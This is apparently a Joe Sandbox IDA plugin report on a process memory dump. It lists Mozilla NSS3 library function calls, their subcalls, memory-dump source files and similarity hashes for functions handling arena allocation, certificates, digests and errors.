                                                                                  • Part of subcall function 6D020B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D020B64
                                                                                • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6D021289,?), ref: 6D022D88
                                                                                • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6D021289,?), ref: 6D022DAF
                                                                                  • Part of subcall function 6CFDB8F0: PR_CallOnceWithArg.NSS3(6D112178,6CFDBCF0,?), ref: 6CFDB915
                                                                                  • Part of subcall function 6CFDB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CFDB933
                                                                                  • Part of subcall function 6CFDB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CFDB9C8
                                                                                  • Part of subcall function 6CFDB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CFDB9E1
                                                                                  • Part of subcall function 6D020A50: SECOID_GetAlgorithmTag_Util.NSS3(6D022A90,E8571076,?,6D022A7C,6D0221F1,?,?,?,00000000,00000000,?,?,6D0221DD,00000000), ref: 6D020A66
                                                                                  • Part of subcall function 6D023310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6D022D1E,?,?,?,?,00000000,?,?,?,?,?,6D021289), ref: 6D023348
                                                                                  • Part of subcall function 6D0206F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6D022E70,00000000), ref: 6D020701
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                • String ID:
                                                                                • API String ID: 2288138528-0
                                                                                • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction ID: 8d1a1dfa9796d649bdb885bbf8f545b3dd26c58178515afb37469108903cc47d
                                                                                • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction Fuzzy Hash: 563108B2D16201ABFB108EB4EC41B6A37A9BF45319F050130ED149B791E731E964C7A2
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFB6C8D
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFB6CA9
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CFB6CC0
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D0D8FE0), ref: 6CFB6CFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                • String ID:
                                                                                • API String ID: 2370200771-0
                                                                                • Opcode ID: 7cefa741a038173a20b118124335881fd97624bf520e130cf43c1103c53d5415
                                                                                • Instruction ID: 5780cce4382c46b31a10ab923c450d9d65034a52b435388c0fe7bd778025b089
                                                                                • Opcode Fuzzy Hash: 7cefa741a038173a20b118124335881fd97624bf520e130cf43c1103c53d5415
                                                                                • Instruction Fuzzy Hash: 333194B5A002169FEB08DF66C891A7FBBF5EF49248F14453DE905E7350EB719901CBA0
                                                                                APIs
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026E36
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D026E57
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026E7D
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026EAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: IntervalMilliseconds$ErrorValue
                                                                                • String ID:
                                                                                • API String ID: 3163584228-0
                                                                                • Opcode ID: 060fae49f5ed3f680292b623915df0e53a428ca2786a2f3d0e27dd802c84fff0
                                                                                • Instruction ID: 83f21e05dbd4a12b3d758c870dd0bf87172362e7b27e5c6803906a0e0f267c58
                                                                                • Opcode Fuzzy Hash: 060fae49f5ed3f680292b623915df0e53a428ca2786a2f3d0e27dd802c84fff0
                                                                                • Instruction Fuzzy Hash: B131E131625513EEFF141F34DD053A6B7A4BB0532AF90463DD89A97240EB306454CBC1
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DDF4
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DE0B
                                                                                • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DE17
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PR_SetError.NSS3(FFFFE009,00000000), ref: 6D00DE80
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                • String ID:
                                                                                • API String ID: 3725328900-0
                                                                                • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                • Instruction ID: f95af28b675bb447243b81dfb0402efc6e8dfc02dcad77581b8d88f252cde972
                                                                                • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                • Instruction Fuzzy Hash: CC3195B1904782ABF700CF56D890766F7E4BFE5318B15822ADA1987B01E774E5A0CBA1
                                                                                APIs
                                                                                • PK11_DigestOp.NSS3(?,?,00000004), ref: 6D030C43
                                                                                  • Part of subcall function 6CFDDEF0: TlsGetValue.KERNEL32 ref: 6CFDDF37
                                                                                  • Part of subcall function 6CFDDEF0: EnterCriticalSection.KERNEL32(?), ref: 6CFDDF4B
                                                                                  • Part of subcall function 6CFDDEF0: PR_SetError.NSS3(00000000,00000000), ref: 6CFDE02B
                                                                                  • Part of subcall function 6CFDDEF0: PR_Unlock.NSS3(?), ref: 6CFDE07E
                                                                                • PK11_DigestOp.NSS3(?,?,00000008), ref: 6D030C85
                                                                                • PK11_DigestOp.NSS3(?,?,?), ref: 6D030C9F
                                                                                • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6D030CB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3186484790-0
                                                                                • Opcode ID: 5c2ae60cab310919b250bbfbad397481437a2d0b961973e0bacaca43b6e4325f
                                                                                • Instruction ID: 58a06423a9d102ae999b68e2baac15ec1358889353553b302a33df5455f137b2
                                                                                • Opcode Fuzzy Hash: 5c2ae60cab310919b250bbfbad397481437a2d0b961973e0bacaca43b6e4325f
                                                                                • Instruction Fuzzy Hash: 7F2108716082579FD701CF789C05BAABBE4AF25204F0A81A5E9445F352E721D928C7B6
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6D022E08
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6D022E1C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6D022E3B
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D022E95
                                                                                  • Part of subcall function 6D011200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D011228
                                                                                  • Part of subcall function 6D011200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D011238
                                                                                  • Part of subcall function 6D011200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D01124B
                                                                                  • Part of subcall function 6D011200: PR_CallOnce.NSS3(6D112AA4,6D0112D0,00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D01125D
                                                                                  • Part of subcall function 6D011200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D01126F
                                                                                  • Part of subcall function 6D011200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D011280
                                                                                  • Part of subcall function 6D011200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D01128E
                                                                                  • Part of subcall function 6D011200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D01129A
                                                                                  • Part of subcall function 6D011200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D0112A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                • String ID:
                                                                                • API String ID: 1441289343-0
                                                                                • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction ID: be63c96f5c53cd712a410e9f013ac982c3083e0e01890b98cb8a15c5197371ef
                                                                                • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction Fuzzy Hash: 8921F971D293464BFB10CFA49D4177A37A47FA131CF124269ED085B252F7B1E594C292
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6CFDACC2
                                                                                  • Part of subcall function 6CFB2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CFB2F0A
                                                                                  • Part of subcall function 6CFB2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFB2F1D
                                                                                  • Part of subcall function 6CFB2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CFB0A1B,00000000), ref: 6CFB2AF0
                                                                                  • Part of subcall function 6CFB2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB2B11
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6CFDAD5E
                                                                                  • Part of subcall function 6CFF57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CFBB41E,00000000,00000000,?,00000000,?,6CFBB41E,00000000,00000000,00000001,?), ref: 6CFF57E0
                                                                                  • Part of subcall function 6CFF57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CFF5843
                                                                                • CERT_DestroyCertList.NSS3(?), ref: 6CFDAD36
                                                                                  • Part of subcall function 6CFB2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CFB2F65
                                                                                  • Part of subcall function 6CFB2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFB2F83
                                                                                • free.MOZGLUE(?), ref: 6CFDAD4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                • String ID:
                                                                                • API String ID: 132756963-0
                                                                                • Opcode ID: 36b0a75613c2e9293cf1e0ca32b2cffade9b7dfe06765049f831ec50fd073722
                                                                                • Instruction ID: c07b7f644646a21dcb7d12b1e1b83bfaeda77e28d1617e472ed5fe427c7bd004
                                                                                • Opcode Fuzzy Hash: 36b0a75613c2e9293cf1e0ca32b2cffade9b7dfe06765049f831ec50fd073722
                                                                                • Instruction Fuzzy Hash: 8621E7B1D002088BEB10DF65D8056EEB7F4EF05208F1A4068D814BB710FB31BA59CBE5
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6D003C9E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003CAE
                                                                                • PR_Unlock.NSS3(?), ref: 6D003CEA
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D03ED34
                                                                                • realloc.MOZGLUE(?,?), ref: 6D03ED5D
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6D03ED74
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • memset.VCRUNTIME140(?,?,?), ref: 6D03ED97
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemsetrealloc
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EDD4
                                                                                • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EDFD
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EE14
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • memcpy.VCRUNTIME140(?,?,6D029767,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EE33
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                APIs
                                                                                • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D045F17,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05AC94
                                                                                • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D045F17,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACA6
                                                                                • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACC0
                                                                                • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACDB
                                                                                Similarity
                                                                                • API ID: free$DestroyFreeK11_Monitor
                                                                                APIs
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFC1DFB
                                                                                  • Part of subcall function 6CFB95B0: TlsGetValue.KERNEL32(00000000,?,6CFD00D2,00000000), ref: 6CFB95D2
                                                                                  • Part of subcall function 6CFB95B0: EnterCriticalSection.KERNEL32(?,?,?,6CFD00D2,00000000), ref: 6CFB95E7
                                                                                  • Part of subcall function 6CFB95B0: PR_Unlock.NSS3(?,?,?,?,6CFD00D2,00000000), ref: 6CFB9605
                                                                                • PR_EnterMonitor.NSS3 ref: 6CFC1E09
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790AB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790C9
                                                                                  • Part of subcall function 6D079090: EnterCriticalSection.KERNEL32 ref: 6D0790E5
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D079116
                                                                                  • Part of subcall function 6D079090: LeaveCriticalSection.KERNEL32 ref: 6D07913F
                                                                                  • Part of subcall function 6CFBE190: PR_EnterMonitor.NSS3(?,?,6CFBE175), ref: 6CFBE19C
                                                                                  • Part of subcall function 6CFBE190: PR_EnterMonitor.NSS3(6CFBE175), ref: 6CFBE1AA
                                                                                  • Part of subcall function 6CFBE190: PR_ExitMonitor.NSS3 ref: 6CFBE208
                                                                                  • Part of subcall function 6CFBE190: PL_HashTableRemove.NSS3(?), ref: 6CFBE219
                                                                                  • Part of subcall function 6CFBE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFBE231
                                                                                  • Part of subcall function 6CFBE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFBE249
                                                                                  • Part of subcall function 6CFBE190: PR_ExitMonitor.NSS3 ref: 6CFBE257
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC1E37
                                                                                • PR_ExitMonitor.NSS3 ref: 6CFC1E4A
                                                                                Similarity
                                                                                • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(?,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC2D
                                                                                  • Part of subcall function 6CFFADC0: TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE10
                                                                                  • Part of subcall function 6CFFADC0: EnterCriticalSection.KERNEL32(?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE24
                                                                                  • Part of subcall function 6CFFADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CFDD079,00000000,00000001), ref: 6CFFAE5A
                                                                                  • Part of subcall function 6CFFADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE6F
                                                                                  • Part of subcall function 6CFFADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE7F
                                                                                  • Part of subcall function 6CFFADC0: TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEB1
                                                                                  • Part of subcall function 6CFFADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEC9
                                                                                • PK11_FreeSymKey.NSS3(?,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC44
                                                                                • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC59
                                                                                • free.MOZGLUE(8CB6FF01,6D036AC6,6D04639C,?,?,?,?,?,?,?,?,?,6D045D40,00000000,?,6D04AAD4), ref: 6D05AC62
                                                                                Similarity
                                                                                • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CFB9003,?), ref: 6D00FD91
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PORT_Alloc_Util.NSS3(A4686D01,?), ref: 6D00FDA2
                                                                                • memcpy.VCRUNTIME140(00000000,12D068C3,A4686D01,?,?), ref: 6D00FDC4
                                                                                • free.MOZGLUE(00000000,?,?), ref: 6D00FDD1
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSectionfree
                                                                                • String ID:
                                                                                • API String ID: 2988086103-0
                                                                                APIs
                                                                                • sqlite3_value_text.NSS3 ref: 6CFA9E1F
                                                                                  • Part of subcall function 6CF613C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CF32352,?,00000000,?,?), ref: 6CF61413
                                                                                  • Part of subcall function 6CF613C0: memcpy.VCRUNTIME140(00000000,6CF32352,00000002,?,?,?,?,6CF32352,?,00000000,?,?), ref: 6CF614C0
                                                                                Strings
                                                                                • LIKE or GLOB pattern too complex, xrefs: 6CFAA006
                                                                                • ESCAPE expression must be a single character, xrefs: 6CFA9F78
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: memcpysqlite3_value_textstrlen
                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                • API String ID: 2453365862-264706735
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D004D57
                                                                                • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6D004DE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorR_snprintf
                                                                                • String ID: %d.%d
                                                                                • API String ID: 2298970422-3954714993
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Value$calloc
                                                                                • String ID:
                                                                                • API String ID: 3339632435-0